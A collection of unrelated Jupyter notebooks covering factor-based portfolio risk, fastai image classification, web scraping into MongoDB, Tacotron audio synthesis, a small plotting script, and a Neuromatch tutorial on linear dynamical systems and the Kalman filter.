book_to_price = 1/Fundamentals.pb_ratio.latest
# Build Filters representing the top and bottom 500 stocks by our combined ranking system.
biggest = market_cap.top(500, mask=QTradableStocksUS())
smallest = market_cap.bottom(500, mask=QTradableStocksUS())
highpb = book_to_price.top(500, mask=QTradableStocksUS())
lowpb = book_to_price.bottom(500, mask=QTradableStocksUS())
universe = biggest | smallest | highpb | lowpb
pipe = Pipeline(
columns = {
'returns' : Returns(window_length=2),
'market_cap' : market_cap,
'book_to_price' : book_to_price,
'biggest' : biggest,
'smallest' : smallest,
'highpb' : highpb,
'lowpb' : lowpb
},
screen=universe
)
return pipe
# Here we run our pipeline and create the return streams for high-minus-low and small-minus-big.
# +
pipe = make_pipeline()
# This takes a few minutes.
results = run_pipeline(pipe, start, end)
R_biggest = results[results.biggest]['returns'].groupby(level=0).mean()
R_smallest = results[results.smallest]['returns'].groupby(level=0).mean()
R_highpb = results[results.highpb]['returns'].groupby(level=0).mean()
R_lowpb = results[results.lowpb]['returns'].groupby(level=0).mean()
SMB = R_smallest - R_biggest
HML = R_highpb - R_lowpb
df = pd.DataFrame({
'SMB': SMB, # company size
'HML': HML # company PB ratio
},columns =["SMB","HML"]).shift(periods =-1).dropna()
MKT = get_pricing('SPY', start_date=start, end_date=end, fields='price').pct_change()[1:]
MKT = pd.DataFrame({'MKT':MKT})
F = pd.concat([MKT,df],axis = 1).dropna()
# -
ax = ((F + 1).cumprod() - 1).plot(subplots=True, title='Cumulative Fundamental Factors')
ax[0].set(ylabel = "daily returns")
ax[1].set(ylabel = "daily returns")
ax[2].set(ylabel = "daily returns")
plt.show()
# ### Calculating the Exposures
#
# Running a multiple linear regression on the fundamental factors for each asset in our universe, we can obtain the corresponding factor exposure for each asset. Here we express:
#
# $$ R_i = \alpha_i + \beta_{i, MKT} R_{i, MKT} + \beta_{i, HML} R_{i, HML} + \beta_{i, SMB} R_{i, SMB} + \epsilon_i$$
#
# for each asset $S_i$. This shows us how much of each individual security's return is made up of these risk factors.
#
# We calculate the risk exposures on an asset-by-asset basis in order to get a more granular view of the risk of our portfolio. This approach requires that we know the holdings of the portfolio itself, on any given day, and is computationally expensive.
# factor exposure
B = pd.DataFrame(index=assets, dtype=np.float32)
epsilon = pd.DataFrame(index=R.index, dtype=np.float32)
# +
x = sm.add_constant(F)
for i in assets:
y = R.loc[:,i]
y_inlier = y[np.abs(y - y.mean())<=(3*y.std())]
x_inlier = x[np.abs(y - y.mean())<=(3*y.std())]
result = sm.OLS(y_inlier, x_inlier).fit()
B.loc[i,"MKT_beta"] = result.params[1]
B.loc[i,"SMB_beta"] = result.params[2]
B.loc[i,"HML_beta"] = result.params[3]
epsilon.loc[:,i] = y - (x.iloc[:,0] * result.params[0] +
x.iloc[:,1] * result.params[1] +
x.iloc[:,2] * result.params[2] +
x.iloc[:,3] * result.params[3])
# -
# The factor exposures are shown as follows. Each individual asset in our universe will have a different exposure to the three included risk factors.
# +
fig,axes = plt.subplots(3, 1)
ax1,ax2,ax3 =axes
B.iloc[0:10,0].plot.barh(ax=ax1, figsize=[15,15], title=B.columns[0])
B.iloc[0:10,1].plot.barh(ax=ax2, figsize=[15,15], title=B.columns[1])
B.iloc[0:10,2].plot.barh(ax=ax3, figsize=[15,15], title=B.columns[2])
ax1.set(xlabel='beta')
ax2.set(xlabel='beta')
ax3.set(xlabel='beta')
plt.show()
# -
B.loc[symbols('AAPL'),:]
# ### Summary of the Setup:
# 1. returns of assets in universe: `R`
# 2. fundamental factors: `F`
# 3. Exposures of these fundamental factors: `B`
# Currently, the `F` DataFrame contains the return streams for MKT, SMB, and HML, by date.
F.head(3)
# While the `B` DataFrame contains point estimates of the beta exposures **to** MKT, SMB, and HML for every asset in our universe.
B.head(3)
# Now that we have these values, we can start to crack open the variance of any portfolio that contains these assets.
# ### Splitting Variance into Common Factor Risks
#
# The portfolio variance can be represented as:
#
# $$\sigma^2 = \omega BVB^{\top}\omega^{\top} + \omega D\omega^{\top}$$
#
# where:
#
# $$\begin{eqnarray}
# B &=& \text{the matrix of factor exposures of $n$ assets to the factors} \\
# V &=& \text{the covariance matrix of factors} \\
# D &=& \text{the specific variance} \\
# \omega &=& \text{the vector of portfolio weights for $n$ assets}\\
# \omega BVB^{\top}\omega^{\top} &=& \text{common factor variance} \\
# \omega D\omega^{\top} &=& \text{specific variance} \\
# \end{eqnarray}$$
# #### Computing Common Factor and Specific Variance:
#
# Here we build functions to break out the risk in our portfolio. Suppose that our portfolio consists of all stocks in the Q3000US, equally-weighted. Let's have a look at how much of the variance of the returns in this universe are due to common factor risk.
w = np.ones([1,R.shape[1]])/R.shape[1]
# +
def compute_common_factor_variance(factors, factor_exposures, w):
B = np.asarray(factor_exposures)
F = np.asarray(factors)
V = np.asarray(factors.cov())
return w.dot(B.dot(V).dot(B.T)).dot(w.T)
common_factor_variance = compute_common_factor_variance(F, B, w)[0][0]
print("Common Factor Variance: {0}".format(common_factor_variance))
# +
def compute_specific_variance(epsilon, w):
D = np.diag(np.asarray(epsilon.var())) * epsilon.shape[0] / (epsilon.shape[0]-1)
return w.dot(D).dot(w.T)
specific_variance = compute_specific_variance(epsilon, w)[0][0]
print("Specific Variance: {0}".format(specific_variance))
# -
# In order to actually calculate the percentage of our portfolio variance that is made up of common factor risk, we do the following:
#
#
# $$\frac{\text{common factor variance}}{\text{common factor variance + specific variance}}$$
common_factor_pct = common_factor_variance/(common_factor_variance + specific_variance)*100.0
print("Percentage of Portfolio Variance Due to Common Factor Risk: {0:.2f}%".format(common_factor_pct))
# So we see that if we just take every single security in the Q3000US and equally-weight them, we will end up possessing a portfolio that effectively only contains common risk.
# ### Risk-Constrained Optimization
#
# Currently we are operating with an equal-weighted portfolio. However, we can reapportion those weights in such a way that we minimize the common factor risk illustrated by our common factor exposures. This is a portfolio optimization problem to find the optimal weights.
#
# We define this problem as:
#
# \begin{array}{ll} \mbox{$\text{minimize/maximum}$}_{w} & \text{objective function}\\
# \mbox{subject to} & {\bf 1}^T \omega = 1, \quad f=B^T\omega\\
# & \omega \in {\cal W}, \quad f \in {\cal F},
# \end{array}
#
# where the variable $w$ is the vector of allocations, the variable $f$ is weighted factor exposures, and the variable ${\cal F}$ provides our constraints for $f$. We set ${\cal F}$ as a vector to bound the weighted factor exposures of the porfolio. These constraints allow us to reject weightings that do not fit our criteria. For example, we can set the maximum factor exposures that our portfolios can have by changing the value of ${\cal F}$. A value of $[1,1,1]$ would indicate that we want the maximum factor exposure of the portfolio to each factor to be less than $1$, rejecting any portfolios that do not meet that condition.
#
# We define the objective function as whichever business goal we value highest. This can be something such as maximizing the Sharpe ratio or minimizing the volatility. Ultimately, what we want to solve for in this optimization problem is the weights, $\omega$.
#
# Let's quickly generate some random weights to see how the weighted factor exposures of the portfolio change.
w_0 = np.random.rand(R.shape[1])
w_0 = w_0/np.sum(w_0)
# The variable $f$ contains the weighted factor exposures of our portfolio, with size equal to the number of factors we have. As we change $\omega$, our weights, our weighted exposures, $f$, also change.
f = B.T.dot(w_0)
f
# A concrete example of this can be found [here](http://nbviewer.jupyter.org/github/cvxgrp/cvx_short_course/blob/master/applications/portfolio_optimization.ipynb), in the docs for CVXPY.
# ### Performance Attribution
#
# Let's take a sample algo from the Quantopian forums and attribute its performance using pyfolio. This should give us an understanding of the specific and common risk associated with the algorithm's return stream.
bt_wsj = get_backtest('59232d19c931f1619e6423c9')
# Now we'll run the algorithm using [Quantopian's built-in risk model](https://www.quantopian.com/posts/new-tool-for-quants-the-quantopian-risk-model) and performance attribution tearsheet. We extend beyond the Fama-French Factors, looking into common factor risk due to sectors and due to particular styles of investment that are common in the market.
bt_wsj.create_perf_attrib_tear_sheet();
# ## References
# * <NAME>., <NAME>. and <NAME>., 2007. *Quantitative equity portfolio management: modern techniques and applications*. CRC Press.
# * <NAME>., 2013. *Inside the Black Box: A Simple Guide to Quantitative and High Frequency Trading*. John Wiley & Sons.
# *This presentation is for informational purposes only and does not constitute an offer to sell, a solicitation to buy, or a recommendation for any security; nor does it constitute an offer to provide investment advisory or other services by Quantopian, Inc. ("Quantopian"). Nothing contained herein constitutes investment advice or offers any opinion with respect to the suitability of any security, and any views expressed herein should not be taken as advice to buy, sell, or hold any security or as an endorsement of any security or company. In preparing the information contained herein, Quantopian, Inc. has not taken into account the investment needs, objectives, and financial circumstances of any particular investor. Any views expressed and data illustrated herein were prepared based upon information, believed to be reliable, available to Quantopian, Inc. at the time of publication. Quantopian makes no guarantees as to their accuracy or completeness. All information is subject to change and may quickly become unreliable for various reasons, including changes in market conditions or economic circumstances.*
|
docs/memo/notebooks/lectures/Factor_Based_Risk_Management/notebook.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (FastAI)
# language: python
# name: fastai
# ---
# L1/L2 Code Along IIA: lesson1.vgg
#
# Replicating: https://github.com/fastai/fastai/blob/master/courses/dl1/lesson1-vgg.ipynb
# ## Image Classification w/ Convolutional Neural Networks
# %reload_ext autoreload
# %autoreload 2
# %matplotlib inline
# +
from fastai.imports import *
from fastai.transforms import *
from fastai.conv_learner import *
from fastai.model import *
from fastai.dataset import *
from fastai.sgdr import *
from fastai.plots import *
# -
PATH = "data/dogscats/"
sz=224
ARCH = vgg16
bs = 16
# Uncomment if need to reset precomputed activations
# !rm -rf {PATH}tmp
data = ImageClassifierData.from_paths(PATH, bs=bs, tfms=tfms_from_model(ARCH, sz))
learn = ConvLearner.pretrained(ARCH, data, precompute=True)
learn.fit(0.01, 3, cycle_len=1)
tfms = tfms_from_model(ARCH, sz, aug_tfms=transforms_side_on, max_zoom=1.1)
data = ImageClassifierData.from_paths(PATH, tfms=tfms, bs=bs, num_workers=4)
learn = ConvLearner.pretrained(ARCH, data, precompute=True)
learn.fit(lrs=1e-2, n_cycle=2)
learn.save('vgg16_00') # just in case I run out of memory below
learn.precompute=False
learn.fit(lrs=1e-2, n_cycle=1, cycle_len=1)
learn.save('vgg16_01')
learn.unfreeze()
learn.data.bs = 4 # training ConvNets takes lots of Memory, cut down bs to prevent crashes
lr = np.array([1e-4, 1e-3, 1e-2])
learn.fit(lrs=lr, n_cycle=1, cycle_len=1)
learn.save('vgg16_02')
learn.lr_find()
learn.fit(lrs=lr, n_cycle=3, cycle_len=1, cycle_mult=2)
learn.save('vgg16_03')
learn.fit(lrs=lr, n_cycle=3, cycle_len=3)
learn.save('vgg16_04')
# ### Testing
#
# Above training stopped midway through 8th epoch. Time for testing:
# +
# %reload_ext autoreload
# %autoreload 2
# %matplotlib inline
from fastai.imports import *
from fastai.transforms import *
from fastai.conv_learner import *
from fastai.model import *
from fastai.dataset import *
from fastai.sgdr import *
from fastai.plots import *
# -
PATH = "data/dogscats/"
sz=224
ARCH = vgg16
bs = 16
data = ImageClassifierData.from_paths(PATH, bs=bs, tfms=tfms_from_model(ARCH, sz),
test_name = 'test1')
# No reason to precompute activations as I'm running a single prediction run on the test set
# Also, since I trained all ConvLayers earlier... where will it know how to compute
# the activations if I haven't loaded the weights yet?
learn = ConvLearner.pretrained(ARCH, data, precompute=False)
# the test data set
len(learn.data.test_dl.dataset)
learn.load('vgg16_04')
# This took about 32 minutes
log_preds = learn.TTA(n_aug=4, is_test=True)[0]
# #### Experimenting with saving as Pandas.DataFrame.to_feather(.)
log_preds_df = pd.DataFrame(log_preds, columns=['dog','cat'])
log_preds_df.to_feather(PATH + 'results/' + 'log_preds')
# +
# log_preds_df = pd.read_feather(PATH + 'results/' + 'log_preds')
# -
test_preds = np.exp(log_preds)
ids = [f[6:-4] for f in learn.data.test_dl.dataset.fnames]
preds = [np.argmax(pred) for pred in test_preds]
submission = pd.DataFrame({'id': ids, 'label': preds})
# #### Another way to create submission file:
submission = pd.DataFrame(preds)
submission.columns = ['label']
submission.insert(0, 'id', ids)
submission.head()
# #### Creating FileLink:
submission.to_csv(PATH + 'subm/' + 'submission_vgg16_04.gz', compression='gzip', index=False)
FileLink(PATH + 'subm/' + 'submission_vgg16_04.gz')
# ---
# +
# %reload_ext autoreload
# %autoreload 2
# %matplotlib inline
from fastai.imports import *
from fastai.transforms import *
from fastai.conv_learner import *
from fastai.model import *
from fastai.dataset import *
from fastai.sgdr import *
from fastai.plots import *
# -
PATH = "data/dogscats/"
sz=224
ARCH = vgg16
bs = 16
data = ImageClassifierData.from_paths(PATH, bs=bs, tfms=tfms_from_model(ARCH, sz),
test_name = 'test1')
# No reason to precompute activations as I'm running a single prediction run on the test set
# Also, since I trained all ConvLayers earlier... where will it know how to compute
# the activations if I haven't loaded the weights yet?
learn = ConvLearner.pretrained(ARCH, data, precompute=False)
learn.load('vgg16_04')
log_preds, y = learn.TTA()
accuracy(log_preds, y)
df = pd.read_feather(PATH + 'results/' + 'log_preds')
df.head()
preds = np.array(list(zip(*(df['dog'],df['cat']))))
preds = np.exp(preds)
preds = [np.argmax(pred) for pred in preds]
new_preds = [int(i==0) for i in preds]
new_preds[:10]
ids = [f[6:-4] for f in learn.data.test_dl.dataset.fnames]
submission = pd.DataFrame({'id': ids, 'label': new_preds})
submission.to_csv(PATH + 'subm/' + 'submission_vgg16_04_wtf.gz', compression='gzip', index=False)
FileLink(PATH + 'subm/' + 'submission_vgg16_04_wtf.gz')
log_preds_df = np.array(list(zip(*(df['dog'],df['cat']))))
test_preds = np.exp(log_preds_df)
test_preds = np.clip(test_preds, 0.05, 0.95)
data.classes
labels = test_preds[:,1]
labels[:10]
learn.data.test_dl.dataset.fnames
ids = [f[6:-4] for f in learn.data.test_dl.dataset.fnames]
submission = pd.DataFrame({'id': ids, 'label': labels})
submission.to_csv(PATH + 'subm/' + 'submission_vgg16_04_omg.csv.gz', compression='gzip', index=False)
FileLink(PATH + 'subm/' + 'submission_vgg16_04_omg.csv.gz')
# ---
#
# This model took roughly 10 ~ 14 hours to train on a GTX870M / Intel Core i7 machine. It achieved a score of `0.07389` when clipped to [0.05:0.95] @ 201/1314 place.
|
FADL1/vgg16_lesson1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
import requests
from scrapy.http import TextResponse
r = requests.get('http://www.concordia.ca/artsci/biology/programs/undergraduate.html')
response = TextResponse(r.url, body=r.text, encoding='utf-8')
# +
import re
# body = response.xpath("//*[not(contains (@class, 'visible-print'))]")
body = response.xpath("""//text()[normalize-space()
and not(ancestor::div[contains (@class, 'c-back-to-top')])
and not(ancestor::div[contains (@class, 'c-topnav top-links')])
and not(ancestor::div[contains (@class, 'c-topnav top-links')])
and not(ancestor::div[contains (@class, 'quick-links link-list')])
and not(ancestor::div[contains (@class, 'parbase emergency-alert')])
and not(ancestor::div[contains (@class, 'visible-print')])
and not(ancestor::a |
ancestor::script |
ancestor::header |
ancestor::noscript |
ancestor::style |
ancestor::footer)]""").extract()
body = " ".join(body)
body = re.sub('\s+',' ', body)
body
# description = response.xpath("//meta[@name='description']").extract_first()
# description = response.xpath("//meta/@content").extract()
# title = response.css('title::text').extract_first()
# -
hrefs = response.xpath('//a/@href').extract()
hrefs
spiders = [
"artsci_biology",
"artsci_chemistry",
"artsci_exercise_science",
"artsci_geography",
"artsci_math",
"artsci_physics",
"artsci_psychology",
"artsci_science_college"
]
from goose import Goose
g = Goose()
article = g.extract(url="http://www.concordia.ca/artsci/biology.html")
article.cleaned_text
|
web_crawler/playbook_scrap.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Dependencies
from bs4 import BeautifulSoup
import requests
import pymongo
# Initialize PyMongo to work with MongoDBs
conn = 'mongodb://localhost:27017'
client = pymongo.MongoClient(conn)
# Define database and collection
db = client.commerce_db
collection = db.items
# +
# URL of page to be scraped
url = 'https://webscraper.io/test-sites/e-commerce/allinone/computers/laptops'
# Retrieve page with the requests module
response = requests.get(url)
# Create BeautifulSoup object; parse with 'lxml'
soup = BeautifulSoup(response.text, 'lxml')
# +
# Examine the results, then determine element that contains sought info
# results are returned as an iterable list
results = soup.find_all('div', class_='caption')
# Loop through returned results
for result in results:
# Error handling
try:
# Identify and return title of listing
title = result.find('a', class_='title').text
# Identify and return price of listing
price = result.find('h4', class_='price').text
# Identify and return link to listing
link = result.a['href']
# Run only if title, price, and link are available
if (title and price and link):
# Print results
print('-------------')
print(title)
print(price)
print(link)
# Dictionary to be inserted as a MongoDB document
post = {
'title': title,
'price': price,
'url': link
}
collection.insert_one(post)
except Exception as e:
print(e)
# +
# Display items in MongoDB collection
listings = db.items.find()
for listing in listings:
print(listing)
# -
|
01-Lesson-Plans/12-Web-Scraping-and-Document-Databases/2/Activities/05-Ins_MongoScraping/Solved/Ins_MongoScraping.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
from datasets.audio import *
import os
from hparams import hparams
n_sample = 0 #Change n_steps here
mel_folder = 'logs-Tacotron/mel-spectrograms' #Or change file path
mel_file = 'mel-prediction-step-{}.npy'.format(n_sample) #Or file name (for other generated mels)
out_dir = 'wav_out'
os.makedirs(out_dir, exist_ok=True)
#mel_file = os.path.join(mel_folder, mel_file)
mel_file = 'training_data/mels/mel-LJ001-0005.npy'
mel_spectro = np.load(mel_file)
mel_spectro.shape
# -
wav = inv_mel_spectrogram(mel_spectro.T, hparams)
#save the wav under test_<folder>_<file>
save_wav(wav, os.path.join(out_dir, 'test_mel_{}.wav'.format(mel_file.replace('/', '_').replace('\\', '_').replace('.npy', ''))),
sr=hparams.sample_rate)
# +
from tacotron.utils.plot import *
plot_spectrogram(mel_spectro, path=os.path.join(out_dir, 'test_mel_{}.png'.format(mel_file.replace('/', '_').replace('\\', '_').replace('.npy', ''))))
# -
lin_file = 'training_data/linear/linear-LJ001-0005.npy'
lin_spectro = np.load(lin_file)
lin_spectro.shape
wav = inv_linear_spectrogram(lin_spectro.T, hparams)
save_wav(wav, os.path.join(out_dir, 'test_linear_{}.wav'.format(mel_file.replace('/', '_').replace('\\', '_').replace('.npy', ''))),
sr=hparams.sample_rate)
plot_spectrogram(lin_spectro, path=os.path.join(out_dir, 'test_linear_{}.png'.format(mel_file.replace('/', '_').replace('\\', '_').replace('.npy', ''))),
auto_aspect=True)
|
griffin_lim_synthesis_tool.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
euler = np.array(pd.read_csv('energy_euler.csv', sep=','))
barneshut = np.array(pd.read_csv('energy_barneshut.csv', sep=','))
ms = np.array(pd.read_csv('energy_ms.csv', sep=','))
fig = plt.figure()
ax1 = fig.add_subplot(111)
#ax1.boxplot()
sets = np.array([], ndmin=2)
lbls = np.array([], ndmin=2)
ax1.set_xticklabels([100,200,500,1000,1500,2000,3000,5000])
ax1.set_xticks([1.5, 4.5, 7.5])
i = 1
for x in [100,200,500,1000,1500,2000,3000,5000]:
ax1.boxplot(euler[euler[:,0] == x][:,1], positions=[i], labels=[x])
print("somelist", [x])
i += 1
plt.show()
|
analysis/.ipynb_checkpoints/energyConservation-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="view-in-github"
# <a href="https://colab.research.google.com/github/NeuromatchAcademy/course-content/blob/master/tutorials/W2D3_DecisionMaking/student/W2D3_Tutorial3.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] colab_type="text"
# # Neuromatch Academy: Week 3, Day 2, Tutorial 3
# # Linear Dynamical Systems & The Kalman Filter
# __Content creators:__ <NAME> and <NAME>
#
# __Content reviewers:__ <NAME>, <NAME>, and <NAME>
#
# **Useful reference:**
# - <NAME> (1998): A unifying review of linear Gaussian Models
# - Bishop (2006): Pattern Recognition and Machine Learning
#
# **Acknowledgement**
#
# This tutorial is in part based on code originally created by <NAME> for Dr. <NAME>'s *Probabilistic Time Series* class at the Center for Data Science, New York University
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 519} colab_type="code" outputId="d75a9b05-d43e-4a8a-968e-6f5c0ecdddae"
#@title Video 1: Introduction
# Insert the ID of the corresponding youtube video
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="6f_51L3i5aQ", width=854, height=480, fs=1)
print("Video available at https://youtu.be/" + video.id)
video
# + [markdown] colab_type="text"
# ---
# # Tutorial Objectives
#
# In the previous tutorials we looked at inferring discrete latent states that give rise to our measurements. In this tutorial, we will learn how to infer a latent model when our states are continuous. Particular attention is paid to the Kalman filter and it's mathematical foundation.
#
# In this tutorial, you will:
# * Review linear dynamical systems
# * Learn about and implement the Kalman filter
# * Explore how the Kalman filter can be used to smooth data from an eye-tracking experiment
#
# + colab={} colab_type="code"
# Install PyKalman (https://pykalman.github.io/)
# !pip install pykalman --quiet
# Imports
import numpy as np
import matplotlib.pyplot as plt
import pykalman
from scipy import stats
# + cellView="form" colab={} colab_type="code"
#@title Figure settings
import ipywidgets as widgets # interactive display
# %config InlineBackend.figure_format = 'retina'
plt.style.use("https://raw.githubusercontent.com/NeuromatchAcademy/course-content/master/nma.mplstyle")
# + cellView="form" colab={} colab_type="code"
#@title Data retrieval and loading
import io
import os
import hashlib
import requests
fname = "W2D3_mit_eyetracking_2009.npz"
url = "https://osf.io/jfk8w/download"
expected_md5 = "20c7bc4a6f61f49450997e381cf5e0dd"
if not os.path.isfile(fname):
try:
r = requests.get(url)
except requests.ConnectionError:
print("!!! Failed to download data !!!")
else:
if r.status_code != requests.codes.ok:
print("!!! Failed to download data !!!")
elif hashlib.md5(r.content).hexdigest() != expected_md5:
print("!!! Data download appears corrupted !!!")
else:
with open(fname, "wb") as fid:
fid.write(r.content)
def load_eyetracking_data(data_fname=fname):
with np.load(data_fname, allow_pickle=True) as dobj:
data = dict(**dobj)
images = [plt.imread(io.BytesIO(stim), format='JPG')
for stim in data['stimuli']]
subjects = data['subjects']
return subjects, images
# + cellView="form" colab={} colab_type="code"
#@title Helper functions
np.set_printoptions(precision=3)
def plot_kalman(state, observation, estimate=None, label='filter', color='r-',
title='LDS', axes=None):
if axes is None:
fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=(16, 6))
ax1.plot(state[:, 0], state[:, 1], 'g-', label='true latent')
ax1.plot(observation[:, 0], observation[:, 1], 'k.', label='data')
else:
ax1, ax2 = axes
if estimate is not None:
ax1.plot(estimate[:, 0], estimate[:, 1], color=color, label=label)
ax1.set(title=title, xlabel='X position', ylabel='Y position')
ax1.legend()
if estimate is None:
ax2.plot(state[:, 0], observation[:, 0], '.k', label='dim 1')
ax2.plot(state[:, 1], observation[:, 1], '.', color='grey', label='dim 2')
ax2.set(title='correlation', xlabel='latent', ylabel='observed')
else:
ax2.plot(state[:, 0], estimate[:, 0], '.', color=color,
label='latent dim 1')
ax2.plot(state[:, 1], estimate[:, 1], 'x', color=color,
label='latent dim 2')
ax2.set(title='correlation',
xlabel='real latent',
ylabel='estimated latent')
ax2.legend()
return ax1, ax2
def plot_gaze_data(data, img=None, ax=None):
# overlay gaze on stimulus
if ax is None:
fig, ax = plt.subplots(figsize=(8, 6))
xlim = None
ylim = None
if img is not None:
ax.imshow(img, aspect='auto')
ylim = (img.shape[0], 0)
xlim = (0, img.shape[1])
ax.scatter(data[:, 0], data[:, 1], c='m', s=100, alpha=0.7)
ax.set(xlim=xlim, ylim=ylim)
return ax
def plot_kf_state(kf, data, ax):
mu_0 = np.ones(kf.n_dim_state)
mu_0[:data.shape[1]] = data[0]
kf.initial_state_mean = mu_0
mu, sigma = kf.smooth(data)
ax.plot(mu[:, 0], mu[:, 1], 'limegreen', linewidth=3, zorder=1)
ax.scatter(mu[0, 0], mu[0, 1], c='orange', marker='>', s=200, zorder=2)
ax.scatter(mu[-1, 0], mu[-1, 1], c='orange', marker='s', s=200, zorder=2)
# + [markdown] colab_type="text"
# ---
# # Section 1: Linear Dynamical System (LDS)
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 519} colab_type="code" outputId="b12e11b3-17bc-4177-9cff-55193ef3980f"
#@title Video 2: Linear Dynamical Systems
# Insert the ID of the corresponding youtube video
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="2SWh639YgEg", width=854, height=480, fs=1)
print("Video available at https://youtu.be/" + video.id)
video
# + [markdown] colab_type="text"
# Latent state variable: $$s_t = Fs_{t-1}+\zeta_t$$
#
# Measured/observed variable: $$y_t = Hs_{t}+\eta_t$$
#
# The latent state variable has dimension $D$ and the measured variable dimension $N$, dimensionality reduction here means that $D<N$.
#
# Both latent and measured variable have Gaussian noise terms:
#
# \begin{eqnarray}
# \zeta_t & \sim & N(0, Q) \\
# \eta_t & \sim & N(0, R) \\
# s_0 & \sim & N(\mu_0, \Sigma_0)
# \end{eqnarray}
#
# As a consequence, $s_t$, $y_t$ and their joint distributions are Gaussian so we can easily compute the marginals and conditionals.
#
# Just as in the HMM, the structure is that of a Markov chain where the state at time point $t$ is conditionally independent of previous states given the state at time point $t-1$.
#
# + [markdown] colab_type="text"
# ## Section 1.1: Sampling
#
# The first thing we will investigate is how to generate timecourse samples from a linear dynamical system given its parameters. We will start by defining the following system:
# + colab={} colab_type="code"
# task dimensions
n_dim_state = 2
n_dim_obs = 2
# initialize model parameters
params = {
'F': 0.5 * np.eye(n_dim_state), # state transition matrix
'Q': np.eye(n_dim_obs), # state noise covariance
'H': np.eye(n_dim_state), # observation matrix
'R': 0.1 * np.eye(n_dim_obs), # observation noise covariance
'mu_0': np.zeros(n_dim_state), # initial state mean
'sigma_0': 0.1 * np.eye(n_dim_state), # initial state noise covariance
}
# + [markdown] colab_type="text"
# **Note**: We used a parameter dictionary `params` above. As the number of parameters we need to provide to our functions increases, it can be beneficial to condense them into a data structure like this to clean up the number of inputs we pass in. The trade-off is that we have to know what is in our data structure to use those values, rather than looking at the function signature directly.
# + [markdown] colab_type="text"
# ### Exercise 1: Sampling from a linear dynamical system
#
# In this exercise you will implement the dynamics functions of a linear dynamical system to sample both a latent space trajectory (given parameters set above) and noisy measurements.
#
# + colab={} colab_type="code"
def sample_lds(n_timesteps, params, seed=0):
""" Generate samples from a Linear Dynamical System specified by the provided
parameters.
Args:
n_timesteps (int): the number of time steps to simulate
params (dict): a dictionary of model paramters: (F, Q, H, R, mu_0, sigma_0)
seed (int): a random seed to use for reproducibility checks
Returns:
ndarray, ndarray: the generated state and observation data
"""
n_dim_state = params['F'].shape[0]
n_dim_obs = params['H'].shape[0]
# set seed
np.random.seed(seed)
# precompute random samples from the provided covariance matrices
# mean defaults to 0
zi = stats.multivariate_normal(cov=params['Q']).rvs(n_timesteps)
eta = stats.multivariate_normal(cov=params['R']).rvs(n_timesteps)
# initialize state and observation arrays
state = np.zeros((n_timesteps, n_dim_state))
obs = np.zeros((n_timesteps, n_dim_obs))
###################################################################
## TODO for students: compute the next state and observation values
# Fill out function and remove
raise NotImplementedError("Student excercise: compute the next state and observation values")
###################################################################
# simulate the system
for t in range(n_timesteps):
# write the expressions for computing state values given the time step
if t == 0:
state[t] = ...
else:
state[t] = ...
# write the expression for computing the observation
obs[t] = ...
return state, obs
# Uncomment below to test your function
# state, obs = sample_lds(100, params)
# print('sample at t=3 ', state[3])
# plot_kalman(state, obs, title='sample')
# + [markdown] colab={"base_uri": "https://localhost:8080/", "height": 482} colab_type="text" outputId="d51c1144-ff76-4d24-c06a-02086c19378b"
# [*Click for solution*](https://github.com/NeuromatchAcademy/course-content/tree/master//tutorials/W3D2_HiddenDynamics/solutions/W3D2_Tutorial3_Solution_8cfee88d.py)
#
# *Example output:*
#
# <img alt='Solution hint' align='left' width=1133 height=414 src=https://raw.githubusercontent.com/NeuromatchAcademy/course-content/master/tutorials/W3D2_HiddenDynamics/static/W3D2_Tutorial3_Solution_8cfee88d_1.png>
#
#
# + [markdown] colab_type="text"
# ### Interactive Demo: Adjusting System Dynamics
# To test your understanding of the parameters of a linear dynamical system, think about what you would expect if you made the following changes:
# 1. Reduce observation noise $R$
# 2. Increase respective temporal dynamics $F$
#
# Use the interactive widget below to vary the values of $R$ and $F$.
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 494, "referenced_widgets": ["b2671333e42c4a07be594f4f53c4b6c7", "9b9135ad6238416bbfa2aa9ceac9afac", "8510497ffc714be5a60f51763ac70d96", "<KEY>", "1ad4749667784b2ebd5d8de21a468764", "<KEY>", "03da26b0bb51475aa305b83e9b142068", "f9c9bcc9628941c8afcceebb3605ee4e", "300ef992f1224dd6ad0e900aacbdca29", "bf9934dbb2d443c2a9597c260428ece4"]} colab_type="code" outputId="4f254285-617a-4bdd-d605-c2559797aaaf"
#@title
#@markdown Make sure you execute this cell to enable the widget!
@widgets.interact(R=widgets.FloatLogSlider(0.1, min=-3, max=1),
F=widgets.FloatSlider(0.5, min=0.0, max=1.0))
def explore_dynamics(R=0.1, F=0.5):
params = {
'F': F * np.eye(n_dim_state), # state transition matrix
'Q': np.eye(n_dim_obs), # state noise covariance
'H': np.eye(n_dim_state), # observation matrix
'R': R * np.eye(n_dim_obs), # observation noise covariance
'mu_0': np.zeros(n_dim_state), # initial state mean,
